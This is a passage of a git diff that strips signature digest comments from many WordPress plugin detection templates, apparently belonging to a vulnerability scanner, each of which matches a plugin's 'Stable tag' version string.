a/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml +++ b/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100b2bde05e776694ba3b9ce6d1a91319cedf3c0fc5835516f813a2177f5c10e8f7022100d4bf72398d782c7ca2779bf9c9f8cabcc3f20080cfe7f657c510f0113ea39369:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/royal-elementor-addons.yaml b/http/technologies/wordpress/plugins/royal-elementor-addons.yaml index 4ff17acba7..b848288b55 100644 --- a/http/technologies/wordpress/plugins/royal-elementor-addons.yaml +++ b/http/technologies/wordpress/plugins/royal-elementor-addons.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100862cdb558e07d1d00973bf2bc66790d44a73cb4a5f9d7d24fe3e6a6d029ccf60022006369d949a3d207772d6bafbb0bb52332471c5b14e30e54d46b5ab696d168954:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/safe-svg.yaml b/http/technologies/wordpress/plugins/safe-svg.yaml index ef0fbed389..4d10178692 100644 --- a/http/technologies/wordpress/plugins/safe-svg.yaml +++ b/http/technologies/wordpress/plugins/safe-svg.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502210099b1d46e6d98122ff5cfbd9b677cf18af72636066ee1cfb33783098554df2963022040ae6001c721e907a1ecdccb90b18b94b0056ea141725cf3263172a0b0ddf952:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/seo-by-rank-math.yaml b/http/technologies/wordpress/plugins/seo-by-rank-math.yaml index 4eeead99e9..7aac0a153f 100644 --- a/http/technologies/wordpress/plugins/seo-by-rank-math.yaml +++ b/http/technologies/wordpress/plugins/seo-by-rank-math.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100d7b51fc69da6c1ad122046ed8eaac25d84a249050b23d8ce7bff80e490fbb1b402203c92953dea3dc1989936a249a1544843c7767fd5e3ef54b7b4c1d928d165b78f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/sg-cachepress.yaml b/http/technologies/wordpress/plugins/sg-cachepress.yaml index c21ab0b210..d0cebd5316 100644 --- a/http/technologies/wordpress/plugins/sg-cachepress.yaml +++ b/http/technologies/wordpress/plugins/sg-cachepress.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022005c4f0783e7700fc17e7f5090ce6df74dda85b19a1adf58a62bbb84d72b90ba10220264d2451bbd0ca881c8543952b040d73315eb22e2480e7c44f63096a35379f5a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/sg-security.yaml b/http/technologies/wordpress/plugins/sg-security.yaml index f007986b7e..ff20779157 100644 --- a/http/technologies/wordpress/plugins/sg-security.yaml +++ b/http/technologies/wordpress/plugins/sg-security.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502207d94db3d3778c9b7b890389d7eb82b653eb42eceb8dc2d95686f3c97d797d90b022100b167740db68f5f0099a3d0b2f637ece715b9a4fd2343555e91a64597d82da426:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml b/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml index 2cc48563ab..fffdc7d017 100644 --- a/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml +++ b/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100a27ece37fd4f62dfa6e7d53750862d0d589c5b21d8f016c1cc0d73826f965dfb022100a1e3ab746bc0b2ad8759b018f0a4dc23a34faa5f74c755d6c4244d8e6b9dc27e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml b/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml index 7b54f0fed9..7a9746a70d 100644 --- a/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml +++ b/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022014b9e40006ae38ceca6a3c2e4faa14e38cd832b4f3e891001f6489fddcf0477b022029f25f819aad27584401091adfe8945b018f2d14ce61ddc0a79dc0ef2ad476e3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/simple-custom-post-order.yaml b/http/technologies/wordpress/plugins/simple-custom-post-order.yaml index 30b96a310f..3fe86debf5 100644 --- a/http/technologies/wordpress/plugins/simple-custom-post-order.yaml +++ b/http/technologies/wordpress/plugins/simple-custom-post-order.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402201c5f3870e8e76700c632726949a763e2448548d03a7e7c7be414f3739c28c1ee02203d0277438a4c14dc74972e0f34cb6cfe067ae17bfdc4a9bac7a4dfe35d93a80d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/simple-history.yaml b/http/technologies/wordpress/plugins/simple-history.yaml index 889e64aeb5..18a7437e94 100644 --- a/http/technologies/wordpress/plugins/simple-history.yaml +++ b/http/technologies/wordpress/plugins/simple-history.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402200c6e45f27a7baf3a9e16399cfbad10a5509ea1bcad713f2951a8ab149c22bcbd02206e8d3f58a4aae721956a734df9d8bee43e69c792db269bb4162aabd0e5c22fed:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/siteguard.yaml b/http/technologies/wordpress/plugins/siteguard.yaml index 16ec8bbeab..3deac58709 100644 --- a/http/technologies/wordpress/plugins/siteguard.yaml +++ b/http/technologies/wordpress/plugins/siteguard.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100d0dc07967aad751369b27e15347540cf58b3da16a72eb20390ae0cc6db872230022100fc6ae03daa218b722dbfb1288f4ffc2946d2f6282e1976c219759dd58c8ca156:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/siteorigin-panels.yaml b/http/technologies/wordpress/plugins/siteorigin-panels.yaml index f20e215ba8..e7e7c27682 100644 --- a/http/technologies/wordpress/plugins/siteorigin-panels.yaml +++ b/http/technologies/wordpress/plugins/siteorigin-panels.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402206ea05ca0c46b16b165917393b8c9235826557509573d74e2a910dd0b2a814a490220797a091b1090a3849eb34f9839572a3dd4d6334faa21a0a28618298be8729706:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/smart-slider-3.yaml b/http/technologies/wordpress/plugins/smart-slider-3.yaml index b379c68c10..ad4ebefa4b 100644 --- a/http/technologies/wordpress/plugins/smart-slider-3.yaml +++ b/http/technologies/wordpress/plugins/smart-slider-3.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100ae5d5c872d8edd31c0659b4de07991a1632cdf8a9a58e805d5ae2edb23660f1e02205f7ba7b949fc3395dbbcf80204dbdba64cc7e30fcb7827233a8681b163715f2b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/so-widgets-bundle.yaml b/http/technologies/wordpress/plugins/so-widgets-bundle.yaml index 79e54cc8d5..8e88c81c0a 100644 --- a/http/technologies/wordpress/plugins/so-widgets-bundle.yaml +++ b/http/technologies/wordpress/plugins/so-widgets-bundle.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022014321f121626af7573107bfbe46dbdfed3b58a3f914aa48397c16c7af28dfa8c02205752775092f4cdf532525b1ac6abf73a56f26ef4a4d3dac720a83158edb8e1df:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml b/http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml index dc0e5bfbcb..39d269fb85 100644 --- a/http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml +++ b/http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402207d554f5ba9e23aa4a9e8bba568ac03f205fbd53399260931b68edb60998886fe0220253735a69b0e1d5891faeef8786e9176a567c8bd947cf1bc6115d9d794091103:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml b/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml index d4fadf4fed..fc126d83c6 100644 --- a/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml +++ b/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100e9c74c58293dd5466da6edb38f619aff2e95e91a9afddc99fa262db126e8c89b022100df9a713c9febb34b2ed0feb4497429aadb3ef63f46ca90d941627ec8bd4f449f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/sucuri-scanner.yaml b/http/technologies/wordpress/plugins/sucuri-scanner.yaml index d00c0349c5..8c49a34259 100644 --- a/http/technologies/wordpress/plugins/sucuri-scanner.yaml +++ b/http/technologies/wordpress/plugins/sucuri-scanner.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450220634c2f8c7597fc93d196ddf87c0629492c879f64e50b06f7883acede011f4182022100c79b55076402f13c6276a62c13bc5a941e9dc5f51169f4b294050b538bd5634e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/svg-support.yaml b/http/technologies/wordpress/plugins/svg-support.yaml index 024cebc10f..c20ed6552a 100644 --- a/http/technologies/wordpress/plugins/svg-support.yaml +++ b/http/technologies/wordpress/plugins/svg-support.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022077c6846b4aa3479bb425195e28987e4427069cc10a8e067f179cdb96a26bee76022008b0dd985c6a4e30e68cb2231e15a21f680c50e2125a20ee8de9b3eac8643223:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/table-of-contents-plus.yaml b/http/technologies/wordpress/plugins/table-of-contents-plus.yaml index f9987823f3..6ac2212b4b 100644 --- a/http/technologies/wordpress/plugins/table-of-contents-plus.yaml +++ b/http/technologies/wordpress/plugins/table-of-contents-plus.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022076510ee07e22d07f991bc01decca43c94829d785b42fd3bade6a9e878202a7e502203eddf3691fefc979889d69f3b0cb6ba236980e92555edf5cf0bbedb92035b6eb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/tablepress.yaml b/http/technologies/wordpress/plugins/tablepress.yaml index 3468d31b23..71c71b5ed1 100644 --- a/http/technologies/wordpress/plugins/tablepress.yaml +++ b/http/technologies/wordpress/plugins/tablepress.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100f19d94392800a45cefb2ff397b8ca3a92301d5219ebc9b967128b788bd3112a402203c954e087e61ab257d9ed617e3bbeee9b4f067fac6d2407097883755f33d7fde:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml b/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml index b66d707a58..7b47adc274 100644 --- a/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml +++ b/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022063275e71829ef6ad516c9d9223f316d944ad1f7a197a18035c64b5c9f145ed38022075ed70bb775766d06e6e9a46de88b84b284f9a5fe46d46918aa60beec6d50592:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/templately.yaml b/http/technologies/wordpress/plugins/templately.yaml index c06a8a9ea1..38391bd9f3 100644 --- a/http/technologies/wordpress/plugins/templately.yaml +++ b/http/technologies/wordpress/plugins/templately.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100a08fbc3fe7a745b40f291dbc03d6fa6b147fc9931dec23538c84a6d095e33c8d022100a5fc42937b040990e3090cc235da413087cca3a05aab224c320a30b44bd3081b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/the-events-calendar.yaml b/http/technologies/wordpress/plugins/the-events-calendar.yaml index ab37b1a954..c4928059f6 100644 --- a/http/technologies/wordpress/plugins/the-events-calendar.yaml +++ b/http/technologies/wordpress/plugins/the-events-calendar.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100d7e87af94ab24904f0cd1ee48790ff1330ecede0f2a7fdadc979a3dc568c4516022100abb5eaa2c6505e5c917b6a5660bd5c74d252c86ab1d66f02f2591c4afe726b6a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/tinymce-advanced.yaml b/http/technologies/wordpress/plugins/tinymce-advanced.yaml index fefdf24c7c..f6a7836f35 100644 --- a/http/technologies/wordpress/plugins/tinymce-advanced.yaml +++ b/http/technologies/wordpress/plugins/tinymce-advanced.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450221009b95a956e932f22d2be5b6e0f6cbf8d526df005b268ab1ded913fdbaa9108a8a02200c9d5efd8557faf5d69fa7157795e165a2ac4b2d6fa48e4310f95c8ffe42d28e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/translatepress-multilingual.yaml b/http/technologies/wordpress/plugins/translatepress-multilingual.yaml index 7d9add1b41..b7af708c4f 100644 --- a/http/technologies/wordpress/plugins/translatepress-multilingual.yaml +++ b/http/technologies/wordpress/plugins/translatepress-multilingual.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100bd02de06bc283a1d75df29d1e8fe289034bce69931233a0f43f3fa1c3d124d84022100f12323a0251687f1c2a23ec3bdc51cadc9c86b7bcb400e305c3c6ff82f0adf5d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml b/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml index 2fbc8cf8aa..61a793edf7 100644 --- a/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml +++ b/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502200f8ee56f534f7337235066e34df1fda0c302384cbfb54dd65656c19b2cb6bc9a022100eb128e09bcc791c2f6996ffa6d7c61ea9ee3ba3c01f6fe303897e19b316d63ed:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/under-construction-page.yaml b/http/technologies/wordpress/plugins/under-construction-page.yaml index 71db87e86c..0da88d5d3f 100644 --- a/http/technologies/wordpress/plugins/under-construction-page.yaml +++ b/http/technologies/wordpress/plugins/under-construction-page.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450220088ddd3d0e2a902dea471eb0a35e67dba56f2f689873910ee2d115adf22d88cd02210094a0156589f6b34a12f6366045afc6fe39117838000689a8f3ff766aee9940c4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/updraftplus.yaml b/http/technologies/wordpress/plugins/updraftplus.yaml index c3a4a1eef7..3e1e79e004 100644 --- a/http/technologies/wordpress/plugins/updraftplus.yaml +++ b/http/technologies/wordpress/plugins/updraftplus.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100e5e2a31f6c635a691428740c37120877d8327d34b4e9cda9e23a3a92e76918c7022100aaf46a188c5eb6357c4e8845747b616e8d6f753e81b2bb731e889526e6dfb2dc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/user-role-editor.yaml b/http/technologies/wordpress/plugins/user-role-editor.yaml index b91c743292..181e619a7c 100644 --- a/http/technologies/wordpress/plugins/user-role-editor.yaml +++ b/http/technologies/wordpress/plugins/user-role-editor.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a004630440220209d98c0feec171ff2f8fc2f4df7c7bdfe9e76905ac6fd952cded9c921d7548102204e6ade201d7669d30e243bcc44d800cf5faed38050e016f4db613b8429aac2a8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/w3-total-cache.yaml b/http/technologies/wordpress/plugins/w3-total-cache.yaml index e83868ca9b..8164eb4483 100644 --- a/http/technologies/wordpress/plugins/w3-total-cache.yaml +++ b/http/technologies/wordpress/plugins/w3-total-cache.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450220582adf756a98fb24ceef4725a3cf251f684089c2269ed95fa919be0cc71afcff022100e056ce8d16bf09093320e35a273b2cbb07e784cbb64b6944ea3dab8140c781d7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/webp-converter-for-media.yaml b/http/technologies/wordpress/plugins/webp-converter-for-media.yaml index 8abb4355d3..59554defdf 100644 --- a/http/technologies/wordpress/plugins/webp-converter-for-media.yaml +++ b/http/technologies/wordpress/plugins/webp-converter-for-media.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450220352f38cf39c04977f2ce7c32a8831060fcd33c5e6d54f8c2ccfee109a20124ed022100e2219c769fef426680e6291f58faab2e2c7cc39edf1cfaa4509cb3aaa0d9d6c0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/webp-express.yaml b/http/technologies/wordpress/plugins/webp-express.yaml index d517d521af..350fd9436b 100644 --- a/http/technologies/wordpress/plugins/webp-express.yaml +++ b/http/technologies/wordpress/plugins/webp-express.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100a8ad5160d7e56a1782ff4dba98c3d903d29c475f26c3012611d8968b08653aed022100a21dd254ec5377ee0aeb94cd605bfc4f82e994f67953e180caed0b2af72650fb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/widget-importer-exporter.yaml b/http/technologies/wordpress/plugins/widget-importer-exporter.yaml index d43139e34a..2ae6bafbba 100644 --- a/http/technologies/wordpress/plugins/widget-importer-exporter.yaml +++ b/http/technologies/wordpress/plugins/widget-importer-exporter.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100d726fccb0e8caa3ff8e1b84e84aa6be3f3b2e6237a9d1b4ee48d92b5002c75f00220242d99c876139bd9646f425459270f5147431f274f1e9832934bf568b9094af6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml b/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml index d23afa216d..d0dc8d92bb 100644 --- a/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml +++ b/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a004630440220692897ea41dcf0ee74304a031553a2be94b26809b80c44d3777e4823142e7ab3022078dd91136da100c9a0f94f6fbd2a12be1a526dd5658da9f22ec34337482050ba:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml b/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml index 61e3be4e81..c49bbc2b6d 100644 --- a/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml +++ b/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502210083de2a05a87510a27fc71a0f15f044381429677a346fb6949cfda048516a35ab022076ade3c2d45269487ba5522dba22b1f49df2a4c687ff3189b01bca1946cbf77a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woo-variation-swatches.yaml b/http/technologies/wordpress/plugins/woo-variation-swatches.yaml index 1cc7897f17..27586cbd9d 100644 --- a/http/technologies/wordpress/plugins/woo-variation-swatches.yaml +++ b/http/technologies/wordpress/plugins/woo-variation-swatches.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100f5ffa4e5005a43603f74ccd33e6f50fa06124c8dba88a69cf662520cd5298413022100a77e83e7dadead063760053fd0a6ef3540a5342e77e333255904c14db029bc9d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml b/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml index 86509ea0c9..946272f0a9 100644 --- a/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402207d2148dcf3a780e7ef85ffbcaa9a3c5e4d13a832621e6aab14801b4f48d821c6022069e738f289ba46c2a289c0addf69a9b80431e51711e3b74777a558795b9ea4bc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml b/http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml index ad44e6f77e..aa29706872 100644 --- a/http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402200a8131b754cdbf40ab79158e4551df104115450a63ec750291de4dc99ab4911f0220474e2e1968d6615d6199c71ae5625c8d0ec87bb050315f0997901f97a8f564bd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-payments.yaml b/http/technologies/wordpress/plugins/woocommerce-payments.yaml index 6ae7278a6e..290d53ab7e 100644 --- a/http/technologies/wordpress/plugins/woocommerce-payments.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-payments.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022057ab7fde9255ac412f4e71c96457564531e468c74afda668b8b87030d44b0664022100f5083c974a71f7af88b8c116beb5e2bc402d740ed1f498b8e737b4fc172b4f2d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml b/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml index e1ef83730b..e83e8d79e7 100644 --- a/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100d464b1ef253342d03da3da3ea24ce030c5aa020ed0d6336065db7d748489ffc80221008684a04c4bf59c7b0104fd2f03fd63b9ca59d4d1e52c586b482711ccdfeef94e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml b/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml index 868339627a..f1c16275a2 100644 --- a/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100f6bc18d26457bafa3f6d899c147174b80e4c2ff4491eb27f78d1feb5dcf92a85022100f81720b818b2153f1f4825be5546a8bc52c26200b11d6a88da92599df98ffa8a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-services.yaml b/http/technologies/wordpress/plugins/woocommerce-services.yaml index a92be49cdd..fc072e19d8 100644 --- a/http/technologies/wordpress/plugins/woocommerce-services.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-services.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100b13b7705581ebfbf09b305914aa2a13ca9744f90758d5fb1d2453a34dbbf1160022100d69b6504e461308a6832906e1689e0a43733147b8e1d63ea587904f95b91a12f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce.yaml b/http/technologies/wordpress/plugins/woocommerce.yaml index 7d90596574..da9df0e8a5 100644 --- a/http/technologies/wordpress/plugins/woocommerce.yaml +++ b/http/technologies/wordpress/plugins/woocommerce.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100e0e8abecdd1d270dbea78510c775feecae72936fbf4adf5cff91d6181932ac8b02206b32fcc176a93043208aaccf6e4b32207fb5b09f1bc3f4c33fb75c288bceb29c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wordfence.yaml b/http/technologies/wordpress/plugins/wordfence.yaml index a439a350bb..f8113d9750 100644 --- a/http/technologies/wordpress/plugins/wordfence.yaml +++ b/http/technologies/wordpress/plugins/wordfence.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502202f73d073b1307b039f79327d1b89dc7234f69fc157889792c059772f82693d24022100b2c5db1f9c073e4a4376284b8a47ac4625ca43090503df16111aa6469a64838b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wordpress-importer.yaml b/http/technologies/wordpress/plugins/wordpress-importer.yaml index 6fc6472d57..5f80282ab2 100644 --- a/http/technologies/wordpress/plugins/wordpress-importer.yaml +++ b/http/technologies/wordpress/plugins/wordpress-importer.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402201fd5a51e6836fce2b0881a30083d16b44ea747efc1f13ef8b5c3128f9d2b1010022048556b2d700dfc31e70cbecf015c3b3fa6822e1fc575fe0f0e18871be4971501:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wordpress-seo.yaml b/http/technologies/wordpress/plugins/wordpress-seo.yaml index e756cefa47..5725d5bb3f 100644 --- a/http/technologies/wordpress/plugins/wordpress-seo.yaml +++ b/http/technologies/wordpress/plugins/wordpress-seo.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402200244d9ddbbffea3fa1df52de798cd026f07d098760e1f56311290b115ea1e62002200ca78fa83fbcb2eb4d6ed7395452f0c1c7f0715d825b16dc1b472c9c0406b720:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/worker.yaml b/http/technologies/wordpress/plugins/worker.yaml index 27ee1c33e3..f67a8bc18a 100644 --- a/http/technologies/wordpress/plugins/worker.yaml +++ b/http/technologies/wordpress/plugins/worker.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 